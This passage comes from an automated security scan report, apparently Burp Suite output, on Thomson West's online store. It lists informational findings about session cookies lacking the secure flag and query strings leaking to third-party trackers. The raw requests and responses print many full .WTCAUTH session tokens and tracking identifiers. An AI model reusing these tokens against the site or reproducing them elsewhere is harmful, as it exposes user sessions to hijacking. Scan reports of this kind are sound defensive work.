3.2. https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://west.thomson.com
Path:
/store/Promotions/EmailPreferences/Login.aspx
Issue detail
The following cookie was issued by the application and does not have the secure flag set:.WTCAUTH=A85C2F3C93F050051A95CC95A3B0888C03B9DBEF0A026D745D0656E2E3DE853394140B6D80EEE33684BAC22241C10BCEC46D800215998CBC7CB21197B52E754E19FAA6C1F1725A6249D03181F66A430ECE47F662E7EF119243B001BEA25F850311DCB9495BBDE849BAEAE38CFAF69EE6C71B979EC9A46B08E8C5B362E255E6FCD960E943F41886886E045C4EB97A5121632E495A2DE980E64EC33F053829F75AEDFBDE371B36DC072FBB362065481E66F8EFF61623D579526A71AC8DD9F30FF1BFAD99A5FA5D2AE551F509B6E57AC0127A7E82DD4063747DCDE458BCBBFA35D0CE53B82A; path=/
Request
GET /store/Promotions/EmailPreferences/Login.aspx?Mstr=wtc&PromCode=571419&FindingMethod=Navigation HTTP/1.1,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=
Response
HTTP/1.1 200 OKSet-Cookie: .WTCAUTH=A85C2F3C93F050051A95CC95A3B0888C03B9DBEF0A026D745D0656E2E3DE853394140B6D80EEE33684BAC22241C10BCEC46D800215998CBC7CB21197B52E754E19FAA6C1F1725A6249D03181F66A430ECE47F662E7EF119243B001BEA25F850311DCB9495BBDE849BAEAE38CFAF69EE6C71B979EC9A46B08E8C5B362E255E6FCD960E943F41886886E045C4EB97A5121632E495A2DE980E64EC33F053829F75AEDFBDE371B36DC072FBB362065481E66F8EFF61623D579526A71AC8DD9F30FF1BFAD99A5FA5D2AE551F509B6E57AC0127A7E82DD4063747DCDE458BCBBFA35D0CE53B82A; path=/ /xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
3.3. https://west.thomson.com/store/secure/EmptyBasket.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://west.thomson.com
Path:
/store/secure/EmptyBasket.aspx
Issue detail
The following cookie was issued by the application and does not have the secure flag set:.WTCAUTH=79CBDB991A6459338884A46B49D0105C145D63087A0F6EA1AF1008AF8F10A6BE20B4B11D124F705A3B3E14AC22EC73DD213F5F9EEB5214BC1762EE7929A0F454C61A0BDCF1DEC78E1A8885681779E756F6C33BB53E5D00DC20A327C71B7A18A01CD2DEC0CB430995B2D528EAE5EDE656A06490C12141D8DC1BDB52EA377E9C528F52835D9BB8C6526E44BC00F17481EEE8BAF4CEFD033D588FC1950953DF71D7BEC464ACA7CC296D962C2F89E8B7BF9E2164F2A2485B2AD03B442B72330D47CEE8F0DEFDB9FFFF7F71AE584B4FEA6F98140E539AF54249B185FB8811D025A5E2F4D81C75; path=/
Request
GET /store/secure/EmptyBasket.aspx HTTP/1.1,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; s_cc=true; c_m2=1; c=undefined645229L86530undefined; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%5D; gpv_pn=Bankruptcy%20Exemption%20Manual%2C%202010%20ed.%20%28West%27s%26%23174%3B%20Bankruptcy%20Series%29; s_ppv=0; s_sq=%5B%5BB%5D%5D; UserSiteIdIdentifier=; .WTCAUTH=0D1C43F14C3D0360D4C56BDD0D49E3A1E347C13F76ADC1B282235271457FAC648FB37FE6B223762A24E6CB268609BC8463ECB71442613CE6C286443DD8C796AD188F8568D73785118A509021BEABBD4E55D10E5F1E3A4F4A3F1B558AB2332C44A56F489B0571AEA92276AE792D9D8761A0FBB7322D072015D4B719941EFD8FCB5CDB63E1CEF01EF859C876D1DA920B7EB3539BA4B4D934B5A3CF2F56BB805BA3F3435E9F173B50A3D9F7C34D0C8E7180A2F74BC8118F96769794F6D4C7A36DCE92EEA8FE38E72E95AF86A85ADB9338C9E73EDA3652910D79D1A7D57B6EF7422F00DB82A9
Response
HTTP/1.1 200 OKSet-Cookie: .WTCAUTH=79CBDB991A6459338884A46B49D0105C145D63087A0F6EA1AF1008AF8F10A6BE20B4B11D124F705A3B3E14AC22EC73DD213F5F9EEB5214BC1762EE7929A0F454C61A0BDCF1DEC78E1A8885681779E756F6C33BB53E5D00DC20A327C71B7A18A01CD2DEC0CB430995B2D528EAE5EDE656A06490C12141D8DC1BDB52EA377E9C528F52835D9BB8C6526E44BC00F17481EEE8BAF4CEFD033D588FC1950953DF71D7BEC464ACA7CC296D962C2F89E8B7BF9E2164F2A2485B2AD03B442B72330D47CEE8F0DEFDB9FFFF7F71AE584B4FEA6F98140E539AF54249B185FB8811D025A5E2F4D81C75; path=/ /xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
3.4. https://west.thomson.com/store/secure/ShippingInfo.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://west.thomson.com
Path:
/store/secure/ShippingInfo.aspx
Issue detail
The following cookie was issued by the application and does not have the secure flag set:.WTCAUTH=C92933A45E8BBE47C7EEF54F80B6D25789CF3B0DE11279B4960956BC8BB0E345579BADF326956E9721B67D71932107D3B64238D6EE6707D06C81817121C5953C161DDD49619F87B8AE2E421C792976F48CA556F7DB0C834EB3BE231FCF4A767E58A07AA7485840E793C3A65F7DEB1BA7BD4CA2E971C144356D50FC6DD68AFCB7569D943E22EBDA2359D2DDAFEEB65197678B43B591B46F28E9EA05EC9F8FE84A521E37C1F57160F4EE7D67E36501BABC3987B29619274E9EBC26949903E1FDAEC56DB8129C91303E8A4BE5A28D8839FB0A532C6B8B24419839BF14AB2C51AD3259D6DF7F; path=/
Request
GET /store/secure/ShippingInfo.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal&Ctl00%24placeHolderTopNavigation%24WeststoreHeader%24cmbBucketCategory=adv_bkt_Books&Ctl00%24placeHolderTopNavigation%24WeststoreHeader%24txtSearch=keyword%2c+title%2c+author+or+ISBN&Ctl00%24placeHolderTopNavigation%24placeHolderContent%24basketItems%24ctl00%24txtQuantity=1&ChkCCMe=CC+Me&PageTitle=cart HTTP/1.1/store/secure/ShoppingBasket.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; s_cc=true; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%5D; s_ppv=66; c_m2=1; c=undefined645229L86530undefined; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=Bankruptcy%20Exemption%20Manual%2C%202010%20ed.%20%28West%27s%26%23174%3B%20Bankruptcy%20Series%29; s_sq=thwest%3D%2526pid%253DBankruptcy%252520Exemption%252520Manual%25252C%2525202010%252520ed.%252520%252528West%252527s%252526%252523174%25253B%252520Bankruptcy%252520Series%252529%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BshowPopupBubble%252528%252527ctl00%252524placeHolderTopNavigation%252524placeHolderContent%252524ctl00%252524popu%2526oidt%253D2%2526ot%253DIMAGE; UserSiteIdIdentifier=; .WTCAUTH=9DFF38C2ED245A836B638A4FD2BB05048EFDFD2A3F3BC8DC4D0876357DAC06B163234E108A8F0DA6FFB919F8831205FF1893BF274F77770E9447A6CF6832F99911CAEA4F06343A555BDF7037EBDAD0392A3B821D6A252C115D9D10A1FD2B10DE395F8581D4BBE49B8B4EF6A088A00BE982BA5CBAAC1C23CD6D40E8E10C4A8CB90101D3CE531D7618D4A99EC6ED09D86A6A87BEB92C84EBB5541C5F4267CA16C317ED73CD9AD52E9BCFFCFA39E7A4F7561999EF701967F4FAEE3513AC9E115F783D6CA97286E2B3D06563DA39F267FA170B8C51C76EEB06DDD6F99A112D49B9ED48435EDE
Response
HTTP/1.1 200 OKSet-Cookie: .WTCAUTH=C92933A45E8BBE47C7EEF54F80B6D25789CF3B0DE11279B4960956BC8BB0E345579BADF326956E9721B67D71932107D3B64238D6EE6707D06C81817121C5953C161DDD49619F87B8AE2E421C792976F48CA556F7DB0C834EB3BE231FCF4A767E58A07AA7485840E793C3A65F7DEB1BA7BD4CA2E971C144356D50FC6DD68AFCB7569D943E22EBDA2359D2DDAFEEB65197678B43B591B46F28E9EA05EC9F8FE84A521E37C1F57160F4EE7D67E36501BABC3987B29619274E9EBC26949903E1FDAEC56DB8129C91303E8A4BE5A28D8839FB0A532C6B8B24419839BF14AB2C51AD3259D6DF7F; path=/ /xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
3.5. https://west.thomson.com/store/secure/ShippingLocation.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://west.thomson.com
Path:
/store/secure/ShippingLocation.aspx
Issue detail
The following cookie was issued by the application and does not have the secure flag set:.WTCAUTH=317228B45D05EAA4FDEA746AAC7BE43F8561B2A283AF9A5155875AD255B46C71677CBC8EA62E3B5CEE39AF7C22128258C3732C9D175B9FEACDC5F2E6FFE5693065611A01C05A38F1E5D84493B7967DC232D933B9102443C77BEF9BFF3E01C8CD15A6463509AC6370E2EC7A2CAB65CC2599C96298961A97FB8BF6C92BC20D040744C918ED8E0C8E71DAD17C3B61362A014C184546A8B80643B718BDEA4BE3456AA6D427C23674A519C4FBE32A9E223D084ADFF81BB8C05F51E37982CC1060BAA31A729FFE99953D24C027132FDB03700957643439D6CC8600B3DA1DBADB71D5F3DB402F3B; path=/
Request
GET /store/secure/ShippingLocation.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal&Ctl00%24placeHolderTopNavigation%24WeststoreHeader%24cmbBucketCategory=adv_bkt_Books&Ctl00%24placeHolderTopNavigation%24WeststoreHeader%24txtSearch=keyword%2c+title%2c+author+or+ISBN&Ctl00%24placeHolderTopNavigation%24placeHolderContent%24basketItems%24ctl00%24txtQuantity=1&ChkCCMe=CC+Me&PageTitle=cart HTTP/1.1/store/secure/ShoppingBasket.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; s_cc=true; c=undefined571422undefined; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%5D; s_ppv=66; c_m2=1; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=Shopping%20Cart; s_sq=thwest%3D%2526pid%253DShopping%252520Cart%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257Btry%25257Bctl00%252524placeHolderTopNavigation%252524placeHolderContent%252524btnProceedBottomHideSub%2526oidt%253D2%2526ot%253DIMAGE; UserSiteIdIdentifier=; .WTCAUTH=FDCDD3CCDE1E864402B9FC99C17C5B887E4F142C7E539940508F9F7479A6A6F433A5B1298DA99CBBD01CC94400DE585D91C0BC2044A5DA3945B77A521C66DF4338A0F22A9AE831BC4D28B1B360FFA8BC5F7FEFCCCD8455667134A5A3C8102426B33E2E3C145412DD2FC7BAE2D1CF511058AF4AC6C8158E791D929260CFD17BFDF9A91806384EB9892622A5C4D4B2F99ACA7BB96849E4E1F35EDDBE997CF3F1A087FAD644670217520402D18C4C7DC1B3E409FCCFD1749D5356AF72C2DE92A54626B4737812FE5F26773127B302BF70BC002DA3B3EDC640107FA24DBEFD453411A2E9878D
Response
HTTP/1.1 302 Found/store/secure/ShippingInfo.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal&Ctl00%24placeHolderTopNavigation%24WeststoreHeader%24cmbBucketCategory=adv_bkt_Books&Ctl00%24placeHolderTopNavigation%24WeststoreHeader%24txtSearch=keyword%2c+title%2c+author+or+ISBN&Ctl00%24placeHolderTopNavigation%24placeHolderContent%24basketItems%24ctl00%24txtQuantity=1&ChkCCMe=CC+Me&PageTitle=cartSet-Cookie: .WTCAUTH=317228B45D05EAA4FDEA746AAC7BE43F8561B2A283AF9A5155875AD255B46C71677CBC8EA62E3B5CEE39AF7C22128258C3732C9D175B9FEACDC5F2E6FFE5693065611A01C05A38F1E5D84493B7967DC232D933B9102443C77BEF9BFF3E01C8CD15A6463509AC6370E2EC7A2CAB65CC2599C96298961A97FB8BF6C92BC20D040744C918ED8E0C8E71DAD17C3B61362A014C184546A8B80643B718BDEA4BE3456AA6D427C23674A519C4FBE32A9E223D084ADFF81BB8C05F51E37982CC1060BAA31A729FFE99953D24C027132FDB03700957643439D6CC8600B3DA1DBADB71D5F3DB402F3B; path=/ >.thomson.com/store/secure/ShippingInfo.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=220...[SNIP]...
3.6. https://west.thomson.com/support/customer-service/order-info.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://west.thomson.com
Path:
/support/customer-service/order-info.aspx
Issue detail
The following cookies were issued by the application and do not have the secure flag set:.WTCAUTH=1A21DC8B98A96EC21459B14B79587A583EC2F9BC37D2E75B5317EF0E65FAFEF6730683DB17DCF2BE06F0B1B98854DE5A707FC465E78510565D9EB9DAE71D857891B9157BA899B658EA734F816E3CE32760B05F6B24F34F4DF7A20D01665DF7E18DCAAC70E57C6EDF44A0197593C73CA0FAE6C559214D35FC361C5715FE43DBF19C70EBD085C78E9E5F286FC92ED8B559596ABC60CEFF4372C361E9E899AF7753D44DE2EF1A434F6907AE0EEE63371718A38CBFF23D5698B65E6F218C4AEADA2868A458441D2D6450C6DDD153EDB3A2CE7A069305EEEB72793F81C52FB84EB011536FEF0B; expires=Tue, 26-Apr-2011 21:13:49 GMT; path=/; HttpOnly .WTCAUTH=62C8AFF94277E664484BBE7EC8277401DE5ADF5C5AEAF45D558739ADCD8069717EDC476F9611DA2668E59CB60B963048A7292391B9104F44FFCFB680230472EE9A68B087279430B80A9137BCF51FCBBE8CAA2B5135B21DAB33E2FF00B71448413EC9C7D9166F621CB8C527C88854A6B0E4DFD5CD34D4666CDACDA3442EF9704AA677452920C07B5940C397045601366D36704513C6FE9B69419D140474085B16735382FEB803D48FC173BBAFD3334424BF0894189520BF2901A304307E3DC9E63E08D54BB0A62CFE50A8B440B11838DBAA606EC4F2C964E593D9C23819FB20FA690F28E5; path=/
Request
GET /support/customer-service/order-info.aspx HTTP/1.1/store/Promotions/EmailPreferences/Login.aspx?Mstr=wtc&PromCode=571419&FindingMethod=Navigation,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; UserSiteIdIdentifier=; .WTCAUTH=E76869171E1A0ADDDC87DE0666682051A5ABA524C2901C7CCEF31A6788A7A438C98C00E7ABD27B50057AA9B35AF82318BE32CAAF21BCE46BA3E3E2EF6BAD7265022CF6605B0D106AF37CB15E717B49BE7FA125545B49CD98D1796358E96925E259D28F2A8CB5B16681BF5B9DE5EB533CEFC7E936BC98024D18199973772A2B0420054643FF9639F13C27CBBB80C1152B2BC7EF70BDEC6C72A6C3ED2F16912510EBC9C641BEB2DCBD2784D94A08DAC3A2CB0C92EBE86CA6DAE5A52262E83175C215F1D237D9058600C65D041AC94F24F8BD7FAFEA186A82F05284BBAB97540DA15E7C4840; s_cc=true; s_ppv=100; c_m2=1; c=undefined571419undefined; SC_LINKS=store%3Apromotions%3Aemailpreferences%3Alogin%5E%5EFree%20Ground%20Shipping%5E%5Estore%3Apromotions%3Aemailpreferences%3Alogin%20%7C%20Free%20Ground%20Shipping%5E%5E; s_ev48=%5B%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%2C%5B%27Referrers%27%2C%271303849270372%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849306606%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849781175%27%5D%5D; gpv_pn=store%3Apromotions%3Aemailpreferences%3Alogin; s_sq=thwest%3D%2526pid%253Dstore%25253Apromotions%25253Aemailpreferences%25253Alogin%2526pidt%253D1%2526oid%253Dhttps%25253A//west.thomson.com/support/customer-service/order-info.aspx%252523freeshipping%2526ot%253DA
Response
HTTP/1.1 200 OKSet-Cookie: .WTCAUTH=1A21DC8B98A96EC21459B14B79587A583EC2F9BC37D2E75B5317EF0E65FAFEF6730683DB17DCF2BE06F0B1B98854DE5A707FC465E78510565D9EB9DAE71D857891B9157BA899B658EA734F816E3CE32760B05F6B24F34F4DF7A20D01665DF7E18DCAAC70E57C6EDF44A0197593C73CA0FAE6C559214D35FC361C5715FE43DBF19C70EBD085C78E9E5F286FC92ED8B559596ABC60CEFF4372C361E9E899AF7753D44DE2EF1A434F6907AE0EEE63371718A38CBFF23D5698B65E6F218C4AEADA2868A458441D2D6450C6DDD153EDB3A2CE7A069305EEEB72793F81C52FB84EB011536FEF0B; expires=Tue, 26-Apr-2011 21:13:49 GMT; path=/; HttpOnly Set-Cookie: .WTCAUTH=62C8AFF94277E664484BBE7EC8277401DE5ADF5C5AEAF45D558739ADCD8069717EDC476F9611DA2668E59CB60B963048A7292391B9104F44FFCFB680230472EE9A68B087279430B80A9137BCF51FCBBE8CAA2B5135B21DAB33E2FF00B71448413EC9C7D9166F621CB8C527C88854A6B0E4DFD5CD34D4666CDACDA3442EF9704AA677452920C07B5940C397045601366D36704513C6FE9B69419D140474085B16735382FEB803D48FC173BBAFD3334424BF0894189520BF2901A304307E3DC9E63E08D54BB0A62CFE50A8B440B11838DBAA606EC4F2C964E593D9C23819FB20FA690F28E5; path=/ /xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" >...[SNIP]...
4. Cross-domain Referer leakage
previous
next
There are 7 instances of this issue:
Issue background
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
4.1. http://west.thomson.com/Error/500Error.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://west.thomson.com
Path:
/Error/500Error.aspx
Issue detail
The page was loaded from a URL containing a query string:http://west.thomson.com/Error/500Error.aspx?aspxerrorpath=/store/productdetail.aspx http://media.richrelevance.com/rrserver/js/0.4/p13n.js http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306 http://thomsonreuters.com/ http://tracker.marinsm.com/tracker/787f8z6077.js http://www.omniture.com/ https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js https://bp.specificclick.net/?pixid=99064401 https://pixel.rubiconproject.com/tap.php?v=5487 https://s7.addthis.com/js/250/addthis_widget.js https://thomson.112.2o7.net/b/ss/devthwest/1/H.20.3--NS/0 https://tracker.marinsm.com/tp?act=1&cid=787f8z6077&script=no
Request
GET /Error/500Error.aspx?aspxerrorpath=/store/productdetail.aspx HTTP/1.1/productdetail/160547/12484463/productdetail.aspx?PromCode=645229L86530&PromType=internal,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; s_cc=true; s_ppv=100; c_m2=1; c=undefined571419undefined; SC_LINKS=store%3Apromotions%3Aemailpreferences%3Alogin%5E%5EFree%20Ground%20Shipping%5E%5Estore%3Apromotions%3Aemailpreferences%3Alogin%20%7C%20Free%20Ground%20Shipping%5E%5E; s_ev48=%5B%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%2C%5B%27Referrers%27%2C%271303849270372%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849306606%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849781175%27%5D%5D; gpv_pn=store%3Apromotions%3Aemailpreferences%3Alogin; s_sq=thwest%3D%2526pid%253Dstore%25253Apromotions%25253Aemailpreferences%25253Alogin%2526pidt%253D1%2526oid%253Dhttps%25253A//west.thomson.com/support/customer-service/order-info.aspx%252523freeshipping%2526ot%253DA; UserSiteIdIdentifier=; .WTCAUTH=15EB1E2BD55FB642DEFDF69E45C933941D077548D9E77F5DFD86AFA9231864655A2D3B0A5DA53C12ECD77027BFA162DFE1C25838CD6ED0BA7EA11DF766E81FF9BE80932A802690C8D89CCD970BFE43D957372263E299FCB576D90CB191BE9C03BFA81FE18D6C1ABC185B6A95A9C3FE7C6D15760BFC5FE4F3A675D865307B7D2C00D2ADADD2A8C8C503C9A225B6F3DB06817479DC6714AA5F037A2AE2E40D4090AC151A6DF079A011C7D783412F0443C1E4CC8EA514A71C6F69B68B045D51D4F25992FD629E534853F1810AB486114ECE9F7CA350D4192436BFB8E836202640C7A7A9CEA9
Response
HTTP/1.1 200 OK6E0DA7E316662F35CD801FB1884F55F2D184C53D0D2F4AA981F1850DC4F54B455CC740DE6A3A61A343349F17598FFF202335A75BD6FA9930A4102F07FA82899CA9DF3ECE6D45B7DFB1136EF60AAF3D1093EB92D363DEDF846159C5EEA4B2C6654B511316A827828B49D7A8F4BAA567EE0AC56D57D345784960460228A95779E1C4391520F348B9037D5ACF439811F80B15F5EFC008F6F0846F5E0EA79BF17D2624B6A8E054DB0507FE036C08288195B48FA84DF92A90D2ACAFF0CE9218C7C1D32DDD289B076CE7A75DDDCC337F829198E1CBF95448E9FD984AE5899980BD9; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... .com/noexpire/combined.5.1.421.22.min.css' /><script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js'> </script><script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js'> </script>...[SNIP]... <script type='text/javascript' src='http://media.richrelevance.com/rrserver/js/0.4/p13n.js'> </script>...[SNIP]... <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=wtcthomsonreuters"> ...[SNIP]... <a href="http://thomsonreuters.com" rel="nofollow" target="_blank"> .thomson.com/buttons/tr_logo_small.jpg'...[SNIP]... <img src="https://bp.specificclick.net?pixid=99064401" id="AlvendaRemarkingTag2" height="0px" width="0px" /> <img src="https://pixel.rubiconproject.com/tap.php?v=5487" id="AlvendaRemarkingTag" height="1px" width="1px" /> ...[SNIP]... <a href="http://www.omniture.com" title="Web Analytics"> <img src="https://thomson.112.2o7.net/b/ss/devthwest/1/H.20.3--NS/0" height="1" width="1" border="0" alt="" /> </a><iframe src='http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306' scrolling='no' width='1' height='1' marginheight='0' marginwidth='0' frameborder='0'> </iframe><!-- begin Marin Software Tracking Script --><script src='http://tracker.marinsm.com/tracker/787f8z6077.js' type='text/javascript'> </script>...[SNIP]... <img src="https://tracker.marinsm.com/tp?act=1&cid=787f8z6077&script=no" > ...[SNIP]...
4.2. http://west.thomson.com/productdetail/160547/12484463/productdetail.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://west.thomson.com
Path:
/productdetail/160547/12484463/productdetail.aspx
Issue detail
The page was loaded from a URL containing a query string:http://west.thomson.com/productdetail/160547/12484463/productdetail.aspx?PromCode=645229L86530&PromType=internal http://media.richrelevance.com/rrserver/js/0.4/p13n.js http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306&browse_products=160547 http://thomsonreuters.com/ http://tracker.marinsm.com/tracker/787f8z6077.js http://www.omniture.com/ https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js https://pixel.rubiconproject.com/tap.php?v=5487 https://s7.addthis.com/js/250/addthis_widget.js https://thomson.112.2o7.net/b/ss/devthwest/1/H.20.3--NS/0 https://tracker.marinsm.com/tp?act=1&cid=787f8z6077&script=no
Request
GET /productdetail/160547/12484463/productdetail.aspx?PromCode=645229L86530&PromType=internal HTTP/1.1,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=
Response
HTTP/1.1 200 OK73540424741E268099E6241C09AA45A626DE2A38C22E931FE39A836ECA06504AB5E11D899AB974340AC3CA22EFA3BB0676F1C0B8373726AAD802F355075EA717D1B28441FC4F53A7328B7FD809F21298A2BB310E7B3E4873D669AB0C1DC219FC364772434FECA03988543E0C149CD8DC2D028D16CDF8B7C86EE82F6122626596B9EC5B4BD031E6A0CB5A74116B5FFAE079B9DC014893820F0EF5A0D46558FF9B020B1DB315FE28D9157A01B864D7CF4B3A9F4F24F0CF57722CEACF6E4E538CFC9886E21DFACDFB09725777C42B39CBFDE80E488D41C726AC1CBF53B9A1753; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... .com/noexpire/combined.5.1.421.22.min.css' /><script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js'> </script><script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js'> </script>...[SNIP]... 